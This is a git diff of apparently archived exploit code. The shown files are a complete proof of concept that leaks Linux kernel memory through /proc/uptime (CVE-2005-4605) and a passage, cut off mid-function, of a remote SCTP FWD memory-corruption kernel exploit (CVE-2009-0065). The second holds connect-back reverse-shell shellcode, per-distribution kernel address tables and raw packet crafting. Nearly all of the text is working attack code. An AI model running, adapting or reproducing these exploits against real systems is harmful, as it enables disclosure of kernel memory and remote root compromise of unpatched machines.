2.6.14.6 procfs Kernel Memory Disclosure - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605 - * - * The procfs code (proc_misc.c) in Linux 2.6.14.3 and other versions before - * 2.6.15 allows attackers to read sensitive kernel memory via unspecified - * vectors in which a signed value is added to an unsigned value. - * - * Usage: - * - * $ gcc cve-2005-4605.c -o cve-2005-4605 - * $ ./cve-2005-4605 - * [+] Opened /proc/uptime. - * [+] Seek to offset 4294963199. - * [+] Read 4096 bytes, dumping to stdout... - * ... - * ... 00 00 00 00 11 00 00 00 ................................ - * ... 3a 30 3a 72 6f 6f 74 00 localhost.......root.x.0:0:root. - * ... 0d 00 00 00 dc 91 0f 08 /root./bin/bash.....@........... - * ... bc af 0e 08 00 00 00 00 ............p................... - * ... - * - * Notes: - * - * This one is _ancient_, but str0ke requested it! ;-) - */ - -#define _FILE_OFFSET_BITS 64 -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define DUMP 4096 -#define PROC "/proc/uptime" - -#define TYPE_SIGNED(t) (! ((t) 0 < (t) -1)) -#define TYPE_MAX(t) ((t) (! TYPE_SIGNED (t) ? (t) -1 : ~ (~ (t) 0 << (sizeof (t) * CHAR_BIT - 1)))) - -const char hex_asc[] = "0123456789abcdef"; -#define hex_asc_lo(x) hex_asc[((x) & 0x0f)] -#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4] - -void -hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, bool ascii) -{ - const uint8_t *ptr = buf; - uint8_t ch; - int j, lx = 0; - int ascii_column; - - if (rowsize != 16 && rowsize != 32) - rowsize = 16; - - if (!len) - goto nil; - if (len > rowsize) - len = rowsize; - if ((len % groupsize) != 0) - groupsize = 1; - - switch (groupsize) { - case 8: { - const uint64_t *ptr8 = buf; - int ngroups = len / groupsize; - - for (j = 0; j < ngroups; j++) - lx += snprintf(linebuf + lx, linebuflen - lx, - "%16.16llx ", (unsigned long long)*(ptr8 + j)); - ascii_column = 17 * ngroups + 2; - break; - } - - case 4: { - const uint32_t *ptr4 = buf; - int ngroups = len / groupsize; - - for (j = 0; j < ngroups; j++) - lx += snprintf(linebuf + lx, linebuflen - lx, - "%8.8x ", *(ptr4 + j)); - ascii_column = 9 * ngroups + 2; - break; - } - - case 2: { - const uint16_t *ptr2 = buf; - int ngroups = len / groupsize; - - for (j = 0; j < ngroups; j++) - lx += snprintf(linebuf + lx, linebuflen - lx, - "%4.4x ", *(ptr2 + j)); - ascii_column = 5 * ngroups + 2; - break; - } - - default: - for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen; - j++) { - ch = ptr[j]; - linebuf[lx++] = hex_asc_hi(ch); - linebuf[lx++] = hex_asc_lo(ch); - linebuf[lx++] = ' '; - } - ascii_column = 3 * rowsize + 2; - break; - } - if (!ascii) - goto nil; - - while (lx < (linebuflen - 1) && lx < (ascii_column - 1)) - linebuf[lx++] = ' '; - for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++) - linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j] - : '.'; -nil: - linebuf[lx++] = '\0'; -} - -void -print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, bool ascii) -{ - const uint8_t *ptr = buf; - int i, linelen, remaining = len; - unsigned char linebuf[200]; - - if (rowsize != 16 && rowsize != 32) - rowsize = 16; - - for (i = 0; i < len; i += rowsize) { - linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize)); - remaining -= rowsize; - hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize, - linebuf, sizeof(linebuf), ascii); - printf("%s\n", linebuf); - } -} - -int -main(void) -{ - int fd, ret; - char buf[DUMP]; - off_t seek, offset=TYPE_MAX(off_t); - - memset(buf, 0, sizeof(buf)); - - fd = open(PROC, O_RDONLY); - if (fd == -1) { - printf("[-] Error during open(2)\n"); - exit(1); - } - - printf("[+] Opened " PROC ".\n"); - - seek = lseek(fd, offset-DUMP, SEEK_SET); - if (seek == -1) { - printf("[-] Error during lseek(2).\n"); - exit(1); - } - - printf("[+] Seek to offset %lld.\n", seek); - - ret = read(fd, buf, DUMP); - if (ret == -1) { - printf("[-] Error during read(2).\n"); - exit(1); - } - - if (ret == 0) { - printf("[-] read(2) return 0 bytes, your kernel may not be vulnerable.\n"); - exit(1); - } - - printf("[+] Read %d bytes, dumping to stdout...\n\n", ret); - - sleep(3); - - print_hex_dump(32, 1, buf, ret, 1); - - return 0; -} - -// milw0rm.com [2009-08-05] +/* + * cve-2005-4605.c + * + * Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605 + * + * The procfs code (proc_misc.c) in Linux 2.6.14.3 and other versions before + * 2.6.15 allows attackers to read sensitive kernel memory via unspecified + * vectors in which a signed value is added to an unsigned value. + * + * Usage: + * + * $ gcc cve-2005-4605.c -o cve-2005-4605 + * $ ./cve-2005-4605 + * [+] Opened /proc/uptime. + * [+] Seek to offset 4294963199. + * [+] Read 4096 bytes, dumping to stdout... + * ... + * ... 00 00 00 00 11 00 00 00 ................................ + * ... 3a 30 3a 72 6f 6f 74 00 localhost.......root.x.0:0:root. + * ... 0d 00 00 00 dc 91 0f 08 /root./bin/bash.....@........... + * ... bc af 0e 08 00 00 00 00 ............p................... + * ... + * + * Notes: + * + * This one is _ancient_, but str0ke requested it! ;-) + */ + +#define _FILE_OFFSET_BITS 64 +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DUMP 4096 +#define PROC "/proc/uptime" + +#define TYPE_SIGNED(t) (! ((t) 0 < (t) -1)) +#define TYPE_MAX(t) ((t) (! TYPE_SIGNED (t) ? (t) -1 : ~ (~ (t) 0 << (sizeof (t) * CHAR_BIT - 1)))) + +const char hex_asc[] = "0123456789abcdef"; +#define hex_asc_lo(x) hex_asc[((x) & 0x0f)] +#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4] + +void +hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, bool ascii) +{ + const uint8_t *ptr = buf; + uint8_t ch; + int j, lx = 0; + int ascii_column; + + if (rowsize != 16 && rowsize != 32) + rowsize = 16; + + if (!len) + goto nil; + if (len > rowsize) + len = rowsize; + if ((len % groupsize) != 0) + groupsize = 1; + + switch (groupsize) { + case 8: { + const uint64_t *ptr8 = buf; + int ngroups = len / groupsize; + + for (j = 0; j < ngroups; j++) + lx += snprintf(linebuf + lx, linebuflen - lx, + "%16.16llx ", (unsigned long long)*(ptr8 + j)); + ascii_column = 17 * ngroups + 2; + break; + } + + case 4: { + const uint32_t *ptr4 = buf; + int ngroups = len / groupsize; + + for (j = 0; j < ngroups; j++) + lx += snprintf(linebuf + lx, linebuflen - lx, + "%8.8x ", *(ptr4 + j)); + ascii_column = 9 * ngroups + 2; + break; + } + + case 2: { + const uint16_t *ptr2 = buf; + int ngroups = len / groupsize; + + for (j = 0; j < ngroups; j++) + lx += snprintf(linebuf + lx, linebuflen - lx, + "%4.4x ", *(ptr2 + j)); + ascii_column = 5 * ngroups + 2; + break; + } + + default: + for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen; + j++) { + ch = ptr[j]; + linebuf[lx++] = hex_asc_hi(ch); + linebuf[lx++] = hex_asc_lo(ch); + linebuf[lx++] = ' '; + } + ascii_column = 3 * rowsize + 2; + break; + } + if (!ascii) + goto nil; + + while (lx < (linebuflen - 1) && lx < (ascii_column - 1)) + linebuf[lx++] = ' '; + for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++) + linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j] + : '.'; +nil: + linebuf[lx++] = '\0'; +} + +void +print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, bool ascii) +{ + const uint8_t *ptr = buf; + int i, linelen, remaining = len; + unsigned char linebuf[200]; + + if (rowsize != 16 && rowsize != 32) + rowsize = 16; + + for (i = 0; i < len; i += rowsize) { + linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize)); + remaining -= rowsize; + hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize, + linebuf, sizeof(linebuf), ascii); + printf("%s\n", linebuf); + } +} + +int +main(void) +{ + int fd, ret; + char buf[DUMP]; + off_t seek, offset=TYPE_MAX(off_t); + + memset(buf, 0, sizeof(buf)); + + fd = open(PROC, O_RDONLY); + if (fd == -1) { + printf("[-] Error during open(2)\n"); + exit(1); + } + + printf("[+] Opened " PROC ".\n"); + + seek = lseek(fd, offset-DUMP, SEEK_SET); + if (seek == -1) { + printf("[-] Error during lseek(2).\n"); + exit(1); + } + + printf("[+] Seek to offset %lld.\n", seek); + + ret = read(fd, buf, DUMP); + if (ret == -1) { + printf("[-] Error during read(2).\n"); + exit(1); + } + + if (ret == 0) { + printf("[-] read(2) return 0 bytes, your kernel may not be vulnerable.\n"); + exit(1); + } + + printf("[+] Read %d bytes, dumping to stdout...\n\n", ret); + + sleep(3); + + print_hex_dump(32, 1, buf, ret, 1); + + return 0; +} + +// milw0rm.com [2009-08-05] diff --git a/platforms/linux/remote/8556.c b/platforms/linux/remote/8556.c index f8c3bb315..074e96585 100755 --- a/platforms/linux/remote/8556.c +++ b/platforms/linux/remote/8556.c @@ -1,1116 +1,1116 @@ -/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption - * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit - * - * coded by: sgrakkyu antifork.org - * http://kernelbof.blogspot.com - * - * - * NOTE: you need at least one sctp application bound on the target box - * - * Supported target: - * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server) - * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server) - * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server) - * Fedora Core 10 x86_64 (default installed kernel) - * OpenSuse 11.1 x86_64 (default installed kernel) - */ - - - - -#define _GNU_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define __OFFSET_PORT_64 62 // 92 -#define __OFFSET_HOST_64 64 // 94 - -//#define __TARGET_SPORT 20000 - - -#ifndef __u8 -#define __u8 uint8_t -#endif - -#ifndef __u16 -#define __u16 uint16_t -#endif - -#ifndef __u32 -#define __u32 uint32_t -#endif - - - -/* start crc routines: ripped from wireshark sources */ -#define SP_LEN 2 -#define DP_LEN 2 -#define VTAG_LEN 4 -#define CHK_LEN 4 -#define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN) - - -#define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF]) -static int32_t crc_c[256] = -{ -0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, -0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL, -0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, -0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, -0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, -0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, -0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, -0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, -0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, -0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, -0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, -0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, -0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, -0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, -0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, -0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, -0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, -0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, -0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, -0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, -0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, -0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, -0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, -0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, -0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, -0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, -0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, -0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, -0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, -0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, -0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, -0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, -0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, -0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, -0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, -0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, -0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, -0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, -0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, -0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, -0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, -0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, -0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, -0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, -0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, -0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, -0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, -0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, -0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, -0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, -0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, -0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, -0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, -0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, -0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, -0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, -0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, -0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, -0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, -0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, -0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, -0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, -0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, -0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L, -}; - -static __u32 sctp_crc32c(const unsigned char* buf, __u32 len) -{ - __u32 i; - __u32 crc32 = ~0U; - __u32 r; - unsigned char b0,b1,b2,b3; - - for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++) - { - CRC32C(crc32, buf[i]); - } - CRC32C(crc32, 0); - CRC32C(crc32, 0); - CRC32C(crc32, 0); - CRC32C(crc32, 0); - for (i = HEADER_LEN; i < len; i++) - { - CRC32C(crc32, buf[i]); - } - r = ~crc32; - - b0 = r & 0xff; - b1 = (r>>8) & 0xff; - b2 = (r>>16) & 0xff; - b3 = (r>>24) & 0xff; - crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3); - return ( crc32 ); -} -/* end crc routines */ - -static char generic_x86_64_shellcode[] = -// prolog -"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb" -"\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80" -"\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0" -"\xb0\x60\x0f\x05\xc3" -// connect back -"\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58" -"\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f" -"\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a" -"\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48" -"\x31\xc0\xb0\xe7\x0f\x05\x90" -"\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75" -"\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48" -"\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48" -"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0" -"\xb0\xe7\x0f\x05" -; - -static const char __zero[4] = {0x00, 0x00, 0x00, 0x00}; -//static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41"; - -static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3"; -static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90"; - -/* ubuntu 7.04 */ -static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF"; -static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF"; - -/* ubuntu 8.04 */ -static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] = "\x00\x50\x62\x80\xFF\xFF\xFF\xFF"; -static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] = "\x00\x40\x62\x80\xFF\xFF\xFF\xFF"; -static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] = "\x00\x30\x62\x80\xFF\xFF\xFF\xFF"; - -static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] = "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF"; - -/* ubuntu 8.10 */ -static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] = "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF"; -static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF"; - -static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF"; - -/* fedora code 10 */ -static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF"; -static char fedora64_10_default_kernel_x86_64_selinux[] = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF"; - -/* opensuse 11.1 */ -static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF"; - - -#define __msg_f(format, args...) \ - do { fprintf(stdout, format, ## args); } while(0) - -#define __msg(msg) \ - do { fprintf(stdout, "%s", msg); } while(0) - -#define __fatal(msg) \ - do {fprintf(stderr, "%s", msg); exit(1);} while (0) - -#define __fatal_perror(msg) \ - do { perror(msg); exit(1); } while (0) - -enum { - SLAB_ALLOCATOR=0, - SLUB_ALLOCATOR=1 -}; - -typedef struct -{ - const char *name; - const char *info; - char *scode; - __u32 scodesize; - __u32 portoff; - __u32 hostoff; - const char *vsysaddr; - const char *vsysjump; - __u32 vsysjumpsize; - - const char *vsyspatchjump; - __u32 vsyspatchjumpsize; - - __u32 chunksize; - __u32 slubsize; - __u32 ptrsize; - - const char *selinux; - - int allocator_type; - -} kinfo; - -static kinfo *k; - -typedef struct -{ - const char* target; - const char* rhost; - const char* lhost; - __u16 rport; - __u16 lport; - - __u16 sport; // defines associations - __u16 nconn; - -} hinfo; - -static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 }; - -static kinfo kernels[] = { - { - "ubuntu64_faisty-2.6.20-[15-17]-generic", - "(faisty: generic kernel)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 256, - 8, - NULL, - SLAB_ALLOCATOR - }, - { - "ubuntu64_faisty-2.6.20-17-server", - "(faisty: server kernel - last 2.6.20-17 build)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_20_17_server_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 256, - 8, - NULL, - SLAB_ALLOCATOR - }, - { - "ubuntu64_hardy-2.6.24-[18-21]-generic", - "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "ubuntu64_hardy_2.6.24-[16-18]-server", - "(kernel from 2.6.24-16 to 2.6.24-18 -- server)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "ubuntu64_hardy-2.6.24-[19-22]-server", - "(kernel from 2.6.24-19 to 2.6.24-22 -- server)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "ubuntu64_hardy-2.6.24-23-last-server", - "(last 2.6.24-23 kernel before patch -- server)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "ubuntu64_intrepid-2.6.27-7-server", - "(kernel 2.6.27-7 -- server)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_27_7_server_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "ubuntu64_intrepid-2.6.27-[9-last]-server", - "(kernel 2.6.27-9 to the last unpatched kernel -- server)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "ubuntu64_intrepid-2.6.27-[7-last]-generic", - "(kernel 2.6.27-9 to the last unpatched kernel -- server)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - NULL, - SLUB_ALLOCATOR - }, - { - "fedora64_10-2.6.25-117", - "(fedora core 10 default installed kernel)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - fedora64_10_default_kernel_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 96, - 8, - fedora64_10_default_kernel_x86_64_selinux, - SLUB_ALLOCATOR - }, - { - "opensuse64_11.1-2.6.27.7-9-default", - "(opensuse 11.1 default installed kernel)", - generic_x86_64_shellcode, - sizeof(generic_x86_64_shellcode) -1, - __OFFSET_PORT_64, - __OFFSET_HOST_64, - opensuse64_11_1_default_kernel_x86_64_vsys_shadow, - generic_x86_64_jump, - 6, - generic_x86_64_patchjump, - 8, - 40, - 256, - 8, - NULL, - SLAB_ALLOCATOR - } -}; - - - -/* modular arithmetic shift */ -#define __SHIFT_CHECK 0x7FFF -static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 }; -static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 }; - -/* global streams obj */ -static __u16 streams[1000][2]; - -/* get stream flow */ -static int build_stream(const void *data, __u32 size, __u16 fc) -{ - int chunk_num,i,j,stnum=0; - __u16 *p; - __u16 *shift; - if(size % 2) - __fatal("[!!!] build_stream: data unaligned"); - - memset(streams, 0x00, sizeof(streams)); - - chunk_num = size / 2; - p = (__u16*)data; - for(i=0; isport = htons(sp); - hdr->dport = htons(dp); - hdr->vtag = htonl(vtag); - hdr->checksum = 0; - fwd = (struct sctp_chunk_fwd *)(hdr->chunks); - fwd->type = SCTP_FWD; - fwd->flags = 0; - fwd->len = htons(4 + 4 + (streamlen * 4)); // chunk + ctsn + streams - fwd->new_tsn = htonl(tsn+1); - - /* build stream */ - pstream = (__u16 *)((&(fwd->new_tsn)) + 1); - for(i=0; ilen) + sizeof(*hdr); - hdr->checksum = htonl(sctp_crc32c(__buff, (__u32)(*p_len))); - return hdr; -} - - - -/* this function gets VTAG/TSN bound with this socket pair */ -int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp, - __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2) -{ - char packet[1500]; - int p_len; - void *end; - struct sctp_hdr *hdr; - struct sctp_chk *chk; - __u32 tmp; - __u16 psp,pdp; - fd_set r; - struct timeval tv; - - int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP); - if(raw_fd < 0) - __fatal_perror("socket: RAW/SCTP"); - - - FD_ZERO(&r); - FD_SET(raw_fd, &r); - tv.tv_usec=0; - tv.tv_sec=10; - - while(select(raw_fd + 1, &r, NULL,NULL,&tv) > 0) - { - p_len = read(raw_fd, packet, sizeof(packet)); - end = packet + p_len; - hdr = (struct sctp_hdr *)(packet + sizeof(struct iphdr)); - if((void*)(((char *)hdr)+4) >= end) - continue; - - /* check for chunk */ - chk = (struct sctp_chk *)(hdr->chunks); - tmp = ntohl(*((__u32*)(chk->data))); - psp = ntohs(hdr->sport); - pdp = ntohs(hdr->dport); - - if(chk->type == SCTP_SACK) - { - if(psp == dp && pdp == sp) - *tsn = tmp; - - if(psp == dp && pdp == sp2) - *tsn2 = tmp; - } - - if(chk->type == SCTP_INIT_ACK) - { - if(psp == dp && pdp == sp) - *vtag = tmp; - - if(psp == dp && pdp == sp2) - *vtag2 = tmp; - } - - if(*vtag && *tsn && *vtag2 && *tsn2) - break; - - FD_ZERO(&r); - FD_SET(raw_fd, &r); - tv.tv_usec=0; - tv.tv_sec=10; - } - - return 0; -} - -/* global vars */ -static __u16 sport=0; -static __u16 sport2=0; -static __u32 vtag=0, vtag2=0; -static __u32 tsn=0, tsn2=0; - -static struct sockaddr_in server_sctp; -int raw_sctp=-1; - -#define STACK_SIZE 0x1000 -char clone_stack[STACK_SIZE*2]; - - -static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2], - int streamlen, __u32 vtag, __u32 tsn) -{ - int p_len=0, ret; - void *packet = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &p_len); - ret = sendto(raw_sctp, packet, p_len, 0, (struct sockaddr *)&server_sctp, sizeof(struct sockaddr_in)); - if(ret < 0) - __fatal_perror("sendto: sending FWD chunk"); - - free(packet); -} - - - -static int clone_thread(void *p) -{ - raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2); - return 0; -} - - -static int make_sctp_connection(__u16 sp, __u16 dp, int data) 